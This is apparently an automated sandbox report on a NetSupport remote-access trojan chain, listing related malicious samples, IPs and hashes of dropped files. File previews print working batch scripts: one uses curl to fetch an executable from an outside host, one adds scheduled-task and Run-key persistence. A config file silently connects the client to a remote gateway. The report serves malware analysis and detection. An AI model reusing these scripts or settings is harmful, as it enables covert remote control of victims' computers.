                                                                                          ChatGPT_3.1.48.exeGet hashmaliciousStealc, VidarBrowse
                                                                                          • 62.172.138.8
                                                                                          file.exeGet hashmaliciousCryptOneBrowse
                                                                                          • 62.172.138.8
                                                                                          file.exeGet hashmaliciousCryptOneBrowse
                                                                                          • 62.172.138.8
                                                                                          file.exeGet hashmaliciousCryptOneBrowse
                                                                                          • 62.172.138.67

                                                                                          ASNs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          MIVOCLOUDMDh60FUiSRcC.jsGet hashmaliciousUnknownBrowse
                                                                                          • 5.252.178.48
                                                                                          h60FUiSRcC.jsGet hashmaliciousUnknownBrowse
                                                                                          • 5.252.178.48
                                                                                          b8tbjIBJHl.elfGet hashmaliciousMiraiBrowse
                                                                                          • 5.252.177.46
                                                                                          7y8aSAoE8h.elfGet hashmaliciousMiraiBrowse
                                                                                          • 5.252.177.46
                                                                                          NKtBM621gg.elfGet hashmaliciousUnknownBrowse
                                                                                          • 5.252.177.46
                                                                                          rV0TrBFR5y.elfGet hashmaliciousMiraiBrowse
                                                                                          • 5.252.177.46
                                                                                          boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                          • 5.252.177.46
                                                                                          boatnet.arm.elfGet hashmaliciousMiraiBrowse
                                                                                          • 5.252.177.46
                                                                                          boatnet.x86.elfGet hashmaliciousMiraiBrowse
                                                                                          • 5.252.177.46
                                                                                          niqS1law5h.jsGet hashmaliciousUnknownBrowse
                                                                                          • 5.252.178.48
                                                                                          niqS1law5h.jsGet hashmaliciousUnknownBrowse
                                                                                          • 5.252.178.48
                                                                                          http://5.252.177.59Get hashmaliciousUnknownBrowse
                                                                                          • 5.252.177.59
                                                                                          http://5.252.177.59Get hashmaliciousUnknownBrowse
                                                                                          • 5.252.177.59
                                                                                          Browser_update.jsGet hashmaliciousUnknownBrowse
                                                                                          • 94.158.244.118
                                                                                          Browser_portable_version.jsGet hashmaliciousUnknownBrowse
                                                                                          • 94.158.244.118
                                                                                          Browser_update.jsGet hashmaliciousUnknownBrowse
                                                                                          • 94.158.244.118
                                                                                          nhVJ8J5qOt.exeGet hashmaliciousPushdoBrowse
                                                                                          • 185.163.45.187
                                                                                          8bx1ECBJPP.jsGet hashmaliciousUnknownBrowse
                                                                                          • 94.158.244.118
                                                                                          8bx1ECBJPP.jsGet hashmaliciousUnknownBrowse
                                                                                          • 94.158.244.118
                                                                                          i7gVJvg3pD.jsGet hashmaliciousUnknownBrowse
                                                                                          • 94.158.244.118

                                                                                          JA3 Fingerprints

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          3b5074b1b5d032e5620f69f9f700ff0eTNT_Shipment_doc.exeGet hashmaliciousAgentTesla, NSISDropperBrowse
                                                                                          • 188.127.225.160
                                                                                          VjFeSeLhGMruZwwyqsIvUMXvstQqpgFfbYh.batGet hashmaliciousUnknownBrowse
                                                                                          • 188.127.225.160
                                                                                          Halkbank_Ekstre_20230718_080954_114612.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 188.127.225.160
                                                                                          Sat#U0131nalma_sipari#U015fi_ve_#U015firket_profili.exeGet hashmaliciousAgentTesla, NSISDropperBrowse
                                                                                          • 188.127.225.160
                                                                                          2_1.batGet hashmaliciousUnknownBrowse
                                                                                          • 188.127.225.160
                                                                                          KGFGayBH4i.exeGet hashmaliciousCustomer LoaderBrowse
                                                                                          • 188.127.225.160
                                                                                          2.batGet hashmaliciousUnknownBrowse
                                                                                          • 188.127.225.160
                                                                                          CMATGTWOiC.exeGet hashmaliciousCustomer LoaderBrowse
                                                                                          • 188.127.225.160
                                                                                          h60FUiSRcC.jsGet hashmaliciousUnknownBrowse
                                                                                          • 188.127.225.160
                                                                                          23qzm5A7rc.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 188.127.225.160
                                                                                          lboRWAQs98.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 188.127.225.160
                                                                                          ukXq7dzEOI.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 188.127.225.160
                                                                                          2.batGet hashmaliciousUnknownBrowse
                                                                                          • 188.127.225.160
                                                                                          sett.batGet hashmaliciousUnknownBrowse
                                                                                          • 188.127.225.160
                                                                                          9q70lA1xYB.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 188.127.225.160
                                                                                          h60FUiSRcC.jsGet hashmaliciousUnknownBrowse
                                                                                          • 188.127.225.160
                                                                                          i04Fj99YfC.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 188.127.225.160
                                                                                          UfSrk8LZGT.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 188.127.225.160
                                                                                          xECZWKhLwO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 188.127.225.160
                                                                                          ORDER.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                          • 188.127.225.160

                                                                                          Dropped Files

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          C:\ProgramData\7zz.exeVjFeSeLhGMruZwwyqsIvUMXvstQqpgFfbYh.batGet hashmaliciousUnknownBrowse
                                                                                            h60FUiSRcC.jsGet hashmaliciousUnknownBrowse
                                                                                              h60FUiSRcC.jsGet hashmaliciousUnknownBrowse
                                                                                                niqS1law5h.jsGet hashmaliciousUnknownBrowse
                                                                                                  niqS1law5h.jsGet hashmaliciousUnknownBrowse
                                                                                                    iGlTkXaLWeKxfXgiFdNuxOaOgbdWVaOw.batGet hashmaliciousUnknownBrowse
                                                                                                      Browser_update.jsGet hashmaliciousUnknownBrowse
                                                                                                        Browser_portable_version.jsGet hashmaliciousUnknownBrowse
                                                                                                          Browser_update.jsGet hashmaliciousUnknownBrowse
                                                                                                            8bx1ECBJPP.jsGet hashmaliciousUnknownBrowse
                                                                                                              8bx1ECBJPP.jsGet hashmaliciousUnknownBrowse
                                                                                                                i7gVJvg3pD.jsGet hashmaliciousUnknownBrowse
                                                                                                                  InstallationAssistant.exeGet hashmaliciousUnknownBrowse
                                                                                                                    11.batGet hashmaliciousUnknownBrowse
                                                                                                                      Chrome_update.jsGet hashmaliciousUnknownBrowse
                                                                                                                        Chrome_update.jsGet hashmaliciousUnknownBrowse
                                                                                                                          UpdateInstaller.jsGet hashmaliciousUnknownBrowse
                                                                                                                            InstallationAssistant (1).exeGet hashmaliciousUnknownBrowse
                                                                                                                              UpdateInstaller.jsGet hashmaliciousUnknownBrowse
                                                                                                                                UpdateInstaller.jsGet hashmaliciousUnknownBrowse

                                                                                                                                  Created / dropped Files

                                                                                                                                  C:\ProgramData\2.bat

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\System32\cmd.exe
                                                                                                                                  File Type:DOS batch file, ASCII text, with very long lines (400), with CRLF line terminators
                                                                                                                                  Category:modified
                                                                                                                                  Size (bytes):787
                                                                                                                                  Entropy (8bit):5.371007510785802
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12:jhXhp+faQFFuP28IFPVa4WSSHVjW2Vj0SaRtfcBidEWSDcEVLh:php41aYSlVURtfcBIEDvLh
                                                                                                                                  MD5:4922DDBA83391B92EF1081381A8E1433
                                                                                                                                  SHA1:77A57DD484737C1D6C7218EE2CD7B84ADBA0FEAE
                                                                                                                                  SHA-256:B474DC9562308D4419D93BC14E8E942290A44036CBCB9477E5ABBB77992CE954
                                                                                                                                  SHA-512:45BD6164BC63F345A8900B5DA65FCD709A9A1DBE912E2A11F479527C6F4842BF6509A027C4E3E897E7CA231F93C0F100A9EBC826619D92E4BEC92DA458F9E9CC
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:@echo off....:: 3Z6f6fs6fssb..:: 3Z6fs6fsb....set "fdaa=set "..%fdaa%"cvbfggdfg=C:\Prog"..%fdaa%"iuiuiuiui=ramD"..%fdaa%"jhggfg=ata\"......start /b /min xcopy /h /y 7zz.exe C:\ProgramData\ && start /b /min xcopy /h /y lol.7z C:\ProgramData\ && start /b /min cmd /c C:\ProgramData\7zz.exe x -y C:\ProgramData\lol.7z -oC:\ProgramData\ && TIMEOUT /T 3 && start /b /min SCHTASKS /create /F /tn "KAVAQQQ" /tr "cmd.exe /c C:\ProgramData\client32.exe" /sc minute /mo 4 /sd 01/01/2022 /st 00:00 && start /b /min cmd /c C:\ProgramData\client32.exe....set KAVAQ=HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run..reg query "%KAVAQ%" >nul 2>&1.. if %errorlevel% equ 0 (.. reg add "%KAVAQ%" /v "KAVAS" /t REG_SZ /d "C:\ProgramData\client32.exe" /f .. ).. ..:: 2Z6f33sd6fsfsRb..:: 1Z6f6fsssRb

                                                                                                                                  C:\ProgramData\7z.bat

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\System32\cmd.exe
                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):241
                                                                                                                                  Entropy (8bit):5.2782527207110315
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:6:CxBR2923fDfFlIw8UlLAHbKx4/mWB1923fmvn:cnzrfF0C0vet+v
                                                                                                                                  MD5:DFCA475A267E9D9B161346F9F7AD57DC
                                                                                                                                  SHA1:987780A88AFC810ED6B5AC6F1C3680F5A067058D
                                                                                                                                  SHA-256:6A6B925C5E7030DB718C319B0D8528D427E9D8DF65CA7C56E6C0910A122048F9
                                                                                                                                  SHA-512:7687512E36900AAD163C91249173B90D8006F7B5F3964626B6E710A13002D60B40EA69E7FCE6798F1E6A8963CF418967AABFD84D1C0288B373747214B6BD11FA
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:if not exist "C:\Users\user\AppData\Local\Temp/7z.exe" ( curl -k "https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe" -o "C:\ProgramData\7zz.exe" ) .."C:\Users\user\AppData\Local\Temp/7zz.exe"..

                                                                                                                                  C:\ProgramData\7zz.exe

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\System32\curl.exe
                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                  Category:modified
                                                                                                                                  Size (bytes):587776
                                                                                                                                  Entropy (8bit):6.439962628647099
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12288:myyKdVnyNhXCV4EkP7AIfzNXZ0b5NrnkcAqIV0A1caRI:mKvyNhXCV4E8BXAfrnkcAqU0A
                                                                                                                                  MD5:42BADC1D2F03A8B1E4875740D3D49336
                                                                                                                                  SHA1:CEE178DA1FB05F99AF7A3547093122893BD1EB46
                                                                                                                                  SHA-256:C136B1467D669A725478A6110EBAAAB3CB88A3D389DFA688E06173C066B76FCF
                                                                                                                                  SHA-512:6BC519A7368EE6BD8C8F69F2D634DD18799B4CA31FBC284D2580BA625F3A88B6A52D2BC17BEA0E75E63CA11C10356C47EE00C2C500294ABCB5141424FC5DC71C
                                                                                                                                  Malicious:false
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                  Joe Sandbox View:
                                                                                                                                  • Filename: VjFeSeLhGMruZwwyqsIvUMXvstQqpgFfbYh.bat, Detection: malicious, Browse
                                                                                                                                  • Filename: h60FUiSRcC.js, Detection: malicious, Browse
                                                                                                                                  • Filename: h60FUiSRcC.js, Detection: malicious, Browse
                                                                                                                                  • Filename: niqS1law5h.js, Detection: malicious, Browse
                                                                                                                                  • Filename: niqS1law5h.js, Detection: malicious, Browse
                                                                                                                                  • Filename: iGlTkXaLWeKxfXgiFdNuxOaOgbdWVaOw.bat, Detection: malicious, Browse
                                                                                                                                  • Filename: Browser_update.js, Detection: malicious, Browse
                                                                                                                                  • Filename: Browser_portable_version.js, Detection: malicious, Browse
                                                                                                                                  • Filename: Browser_update.js, Detection: malicious, Browse
                                                                                                                                  • Filename: 8bx1ECBJPP.js, Detection: malicious, Browse
                                                                                                                                  • Filename: 8bx1ECBJPP.js, Detection: malicious, Browse
                                                                                                                                  • Filename: i7gVJvg3pD.js, Detection: malicious, Browse
                                                                                                                                  • Filename: InstallationAssistant.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: 11.bat, Detection: malicious, Browse
                                                                                                                                  • Filename: Chrome_update.js, Detection: malicious, Browse
                                                                                                                                  • Filename: Chrome_update.js, Detection: malicious, Browse
                                                                                                                                  • Filename: UpdateInstaller.js, Detection: malicious, Browse
                                                                                                                                  • Filename: InstallationAssistant (1).exe, Detection: malicious, Browse
                                                                                                                                  • Filename: UpdateInstaller.js, Detection: malicious, Browse
                                                                                                                                  • Filename: UpdateInstaller.js, Detection: malicious, Browse
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}.rR9p..9p..9p..Bl..;p...l.. p...V..[p...xC.8p..9p...p...xA.>p...V...p..V....p..V...;p...v..8p..Rich9p..................PE..L....S.L............................L.............@.........................................................................\...P.......(...............................................................................P............................text............................... ..`.rdata..............................@..@.data............l..................@....sxdata.............................@....rsrc...(...........................@..@................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\ProgramData\HINTSS.txt

                                                                                                                                  Download File
                                                                                                                                  Process:C:\ProgramData\7zz.exe
                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):18
                                                                                                                                  Entropy (8bit):2.8855130303998817
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:LrAS/:l
                                                                                                                                  MD5:A9AD5FB13439DCBBA98490491C71B484
                                                                                                                                  SHA1:D0595360A83B8DEEAC3E61407BD654E747203CE3
                                                                                                                                  SHA-256:FFB1559BEEAEC3262BE121C2F41D3D15BF193531B7A2B9A73ABFEF6D805BD64F
                                                                                                                                  SHA-512:E1EEB583031D26C14669CFCCE9ABB7D98C8347D490CE0B807D0E31009C3A6D7EFB4FD7163D3ADEF39F15E45F0680574AEA43F97F1305E7DC98CD1F124A2CE15E
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:HERE THE HELP FILE

                                                                                                                                  C:\ProgramData\HTCTL32.DLL

                                                                                                                                  Download File
                                                                                                                                  Process:C:\ProgramData\7zz.exe
                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):328056
                                                                                                                                  Entropy (8bit):6.7547459359511395
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:6144:Hib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OKB:Hib5YbsXioEgULFpSzya9/lY5SilQCfR
                                                                                                                                  MD5:C94005D2DCD2A54E40510344E0BB9435
                                                                                                                                  SHA1:55B4A1620C5D0113811242C20BD9870A1E31D542
                                                                                                                                  SHA-256:3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899
                                                                                                                                  SHA-512:2E6F673864A54B1DCAD9532EF9B18A9C45C0844F1F53E699FADE2F41E43FA5CBC9B8E45E6F37B95F84CF6935A96FBA2950EE3E0E9542809FD288FEFBA34DDD6A
                                                                                                                                  Malicious:false
                                                                                                                                  Yara Hits:
                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\HTCTL32.DLL, Author: Joe Security
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......._....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\ProgramData\NSM.LIC

                                                                                                                                  Download File
                                                                                                                                  Process:C:\ProgramData\7zz.exe
                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):258
                                                                                                                                  Entropy (8bit):5.1458289587885675
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:6:O/oPDvXk4xRPjwx3LzX81DKHMoEEjLgpW2MorGLUfKdYpPM/ioxTKa8l6i7s:X7XZR7wx3LzXBJjjqW2M23KKPM/iox7X
                                                                                                                                  MD5:1B41E64C60CA9DFADEB063CD822AB089
                                                                                                                                  SHA1:ABFCD51BB120A7EAE5BBD9A99624E4ABE0C9139D
                                                                                                                                  SHA-256:F4E2F28169E0C88B2551B6F1D63F8BA513FEB15BEACC43A82F626B93D673F56D
                                                                                                                                  SHA-512:C97E0EABEA62302A4CFEF974AC309F3498505DD055BA74133EE2462E215B3EBC5C647E11BCBAC1246B9F750B5D09240CA08A6B617A7007F2FA955F6B6DD7FEE4
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:1200..0xa353ff01....; NetSupport License File...; Generated on 14:45 - 17/07/2022........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=HANEYMANEY..maxslaves=8888..os2=1..product=10..serial_no=NSM385736..shrink_wrap=0..transport=0..

                                                                                                                                  C:\ProgramData\NSM.ini

                                                                                                                                  Download File
                                                                                                                                  Process:C:\ProgramData\7zz.exe
                                                                                                                                  File Type:Generic INItialization configuration [Features]
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):6458
                                                                                                                                  Entropy (8bit):4.645519507940197
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:B6pfGAtXOdwpEKyhuSY92fihuUhENXh8o3IFhucOi49VLO9kNVnkOeafhuK7cwo4:BnwpwYFuy6/njroYbe3j1vlS
                                                                                                                                  MD5:88B1DAB8F4FD1AE879685995C90BD902
                                                                                                                                  SHA1:3D23FB4036DC17FA4BEE27E3E2A56FF49BEED59D
                                                                                                                                  SHA-256:60FE386112AD51F40A1EE9E1B15ECA802CED174D7055341C491DEE06780B3F92
                                                                                                                                  SHA-512:4EA2C20991189FE1D6D5C700603C038406303CCA594577DDCBC16AB9A7915CB4D4AA9E53093747DB164F068A7BA0F568424BC8CB7682F1A3FB17E4C9EC01F047
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:..[General]..ClientParams=..CLIENT32=..Installdir=..NOARP=..SuppressAudio=......[Features]..Client=1..Configurator=..Control=..Gateway=..PINServer=..RemoteDeploy=..Scripting=..Student=..TechConsole=..Tutor=......[StartMenuIcons]..ClientIcon=..ConfigIcon=..ControlIcon=..RemoteDeployIcon=..ScriptingIcon=..TechConsoleIcon=..TutorIcon=......[DesktopIcons]..ControlDeskIcon=..TechConsoleDeskIcon=..TutorDeskIcon=............; This NSM.ini file can be used to customise the component selections when performing a silent installation of the product.....; Client=<1/Blank>..; e.g...; Client=1..; Controls whether the client component is installed (1) on the target machine or not (Blank)..;....; CLIENT32=<blank/not blank>..; e.g...;. CLIENT32=..;. Setting this to anything causes the Client Service (if installed) to be set to manual start rather than automatic..;....; ClientIcon=<1/Blank>..; e.g...; ClientIcon=1..; Controls whether shortcut icons are placed on t

                                                                                                                                  C:\ProgramData\PCICHEK.DLL

                                                                                                                                  Download File
                                                                                                                                  Process:C:\ProgramData\7zz.exe
                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):18808
                                                                                                                                  Entropy (8bit):6.292094060787929
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:dogL7bo2t6n76RRHirmH/L7jtd3hfwjKd3hfwB7bjuZRvI:dogL7bo2YrmRTAKT0iTI
                                                                                                                                  MD5:104B30FEF04433A2D2FD1D5F99F179FE
                                                                                                                                  SHA1:ECB08E224A2F2772D1E53675BEDC4B2C50485A41
                                                                                                                                  SHA-256:956B9FA960F913CCE3137089C601F3C64CC24C54614B02BBA62ABB9610A985DD
                                                                                                                                  SHA-512:5EFCAA8C58813C3A0A6026CD7F3B34AD4FB043FD2D458DB2E914429BE2B819F1AC74E2D35E4439601CF0CB50FCDCAFDCF868DA328EAAEEC15B0A4A6B8B2C218F
                                                                                                                                  Malicious:false
                                                                                                                                  Yara Hits:
                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\PCICHEK.DLL, Author: Joe Security
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Yu....i...i...i.......i..Z...i.......i......i......i..l....i...h.~.i......i......i......i.......i.Rich..i.................PE..L....A.W...........!......................... ...............................`.......U....@.........................@#..r...h!..P....@............... ..x)...P......P ............................... ..@............ ..D............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\ProgramData\PCICL32.DLL

                                                                                                                                  Download File
                                                                                                                                  Process:C:\ProgramData\7zz.exe
                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):3740024
                                                                                                                                  Entropy (8bit):6.527276298837004
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:49152:0KJKmPEYIPqxYdoF4OSvxmX3+m7OTqupa7HclSpTAyFMJa:0KJ/zIPq7F4fmXO8u6kS+y/
                                                                                                                                  MD5:D3D39180E85700F72AAAE25E40C125FF
                                                                                                                                  SHA1:F3404EF6322F5C6E7862B507D05B8F4B7F1C7D15
                                                                                                                                  SHA-256:38684ADB2183BF320EB308A96CDBDE8D1D56740166C3E2596161F42A40FA32D5
                                                                                                                                  SHA-512:471AC150E93A182D135E5483D6B1492F08A49F5CCAB420732B87210F2188BE1577CEAAEE4CE162A7ACCEFF5C17CDD08DC51B1904228275F6BBDE18022EC79D2F
                                                                                                                                  Malicious:false
                                                                                                                                  Yara Hits:
                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\ProgramData\PCICL32.DLL, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\PCICL32.DLL, Author: Joe Security
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J.>N+.mN+.mN+.m.eAmL+.mU.Gmd+.m!]rmF+.mU.EmJ+.mGSZmA+.mGS]mO+.mGSJmi+.mN+.m.(.mU.rm.+.mU.sm.+.mU.BmO+.mU.CmO+.mU.DmO+.mRichN+.m........................PE..L......X...........!.....(...$ .............@................................9.....Y.9.............................p................p................8.x)...`7.p....Q.......................c......@c..@............@..(.......`....................text...l'.......(.................. ..`.rdata..s....@.......,..............@..@.data....%... ......................@....tls.........P......................@....hhshare.....`......................@....rsrc........p......................@..@.reloc...3...`7..4....6.............@..B................................................................................................................................................................................................

                                                                                                                                  C:\ProgramData\TCCTL32.DLL

                                                                                                                                  Download File
                                                                                                                                  Process:C:\ProgramData\7zz.exe
                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):396664
                                                                                                                                  Entropy (8bit):6.809064783360712
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12288:OpwbUb48Ju0LIFZB4Qaza4yFaMHAZtJ4Yew2j/bJa+neNQ:epq7BaGIn4BbLneNQ
                                                                                                                                  MD5:EAB603D12705752E3D268D86DFF74ED4
                                                                                                                                  SHA1:01873977C871D3346D795CF7E3888685DE9F0B16
                                                                                                                                  SHA-256:6795D760CE7A955DF6C2F5A062E296128EFDB8C908908EDA4D666926980447EA
                                                                                                                                  SHA-512:77DE0D9C93CCBA967DB70B280A85A770B3D8BEA3B707B1ABB037B2826B48898FEC87924E1A6CCE218C43478E5209E9EB9781051B4C3B450BEA3CD27DBD32C7F3
                                                                                                                                  Malicious:false
                                                                                                                                  Yara Hits:
                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\TCCTL32.DLL, Author: Joe Security
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L...Y?XV...........!................................................................'.....@.............................o...T...x....0..@...............x)...@..\E..................................`d..@...............h............................text............................... ..`.rdata../...........................@..@.data...h............|..............@....rsrc...@....0......................@..@.reloc.. F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\ProgramData\client32.exe

                                                                                                                                  Download File
                                                                                                                                  Process:C:\ProgramData\7zz.exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):101680
                                                                                                                                  Entropy (8bit):4.481468672521447
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:384:qUjV5+6j6Qa86Fkv2Wr120hZIq6nYPL7NheMxnB1:qgVZl6FhWr80/h6EN/
                                                                                                                                  MD5:F70B67C2B3204B7DDD8B755799CCCFF0
                                                                                                                                  SHA1:A42E55E328D62D11E687C167BB7049D46F0F9B26
                                                                                                                                  SHA-256:213AF995D4142854B81AF3CF73DEE7FFE9D8AD6E84FDA6386029101DBF3DF897
                                                                                                                                  SHA-512:54FCBA8A063BFBAAE4C3A39624BF3407DB6AF5699AB8686F936AB03C5864DF7A44D089066FA2D4AEDF5AD50D6B04624966A5111BF57BEC1DDA74A571F1DD7C63
                                                                                                                                  Malicious:true
                                                                                                                                  Yara Hits:
                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\client32.exe, Author: Joe Security
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 11%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i.......i..6....i...h...i..6...i..6..i..6....i.Rich..i.........................PE..L...T..U.....................n...... ........ ....@.......................................@.................................< ..<....0...i...........t..0........... ............................................... ...............................text............................... ..`.rdata..V.... ......................@..@.rsrc....i...0...j..................@..@.reloc..l............r..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\ProgramData\client32.ini

                                                                                                                                  Download File
                                                                                                                                  Process:C:\ProgramData\7zz.exe
                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):713
                                                                                                                                  Entropy (8bit):5.26282931636882
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12:iOxS2h3q+jhGSGpBlsVTXuZ7+DP98XTKIDWss1CYubluh1fv09GJ/:iOI2hFhapBlLoGXuIDvsPuEs4t
                                                                                                                                  MD5:99C9A23CA6754F0CF146A095E9E666D3
                                                                                                                                  SHA1:817EBBA693F606C1CB8C5524360961B13642E6B9
                                                                                                                                  SHA-256:AE1399C7B00710CDD7C119BEE4B42C107BFEE79C399B27A497A19094150F53AD
                                                                                                                                  SHA-512:68970CF9EC3065860AE60A225014A71A1AAC1311102605B7FB85C58FC76537A44169FAC1FA9368E1AA82F564147626F46B194B89300E171D6FA740E57A5B3402
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:0xd2aa09cb....[Client].._present=1..AlwaysOnTop=1..DisableChat=1..DisableChatMenu=0..DisableClientConnect=0..DisableCloseApps=1..DisableDisconnect=0..DisableManageServices=1..DisableMessage=1..DisableReplayMenu=0..DisableRequestHelp=0..HideWhenIdle=1..Protocols=3..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SOS_Alt=0..SOS_LShift=0..SOS_RShift=0..SysTray=0..UnloadMirrorOnDisconnect=1..Usernames=*....[_Info]..Filename=C:\Users\Administrator\Desktop\1\client32.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[Bridge]..Modem=....[General]..BeepUsingSpeaker=0....[HTTP]..CMPI=60..GatewayAddress=5.252.178.48:443..GSK=GA;L@KDPHB<P@DDHGI;J@MCO..Port=443..SecondaryGateway=..SecondaryPort=..

                                                                                                                                  C:\ProgramData\lol.7z

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\System32\curl.exe
                                                                                                                                  File Type:7-zip archive data, version 0.4
                                                                                                                                  Category:modified
                                                                                                                                  Size (bytes):2305650
                                                                                                                                  Entropy (8bit):7.9999152596235446
                                                                                                                                  Encrypted:true
                                                                                                                                  SSDEEP:49152:gDHf7GK0RIZLYUIFWsFYL7084J3Sr7Y1t/iAJkxNkvTMTTi0oIFJePBM5Pk:gDHfcyZ8/FW8Y9m9i5IvE+
                                                                                                                                  MD5:7BFC5AD1796A0BBAEFCAD64239543506
                                                                                                                                  SHA1:BB1F0B198D9011B00164FAD88523C35369EB9E4A
                                                                                                                                  SHA-256:42679BD369A3B772C43B9BA20BF8A31A2593A360CFA2DE77AA6D2023F9A0C109
                                                                                                                                  SHA-512:90DFAC808C2009439EBFF3EF0FCFB95CB4FCE1176B9C5D7587A6908E66687DC0F6592D29F71BF1C19A73F82522298625052791E9620BEEE285BEBE613A00D091
                                                                                                                                  Malicious:false
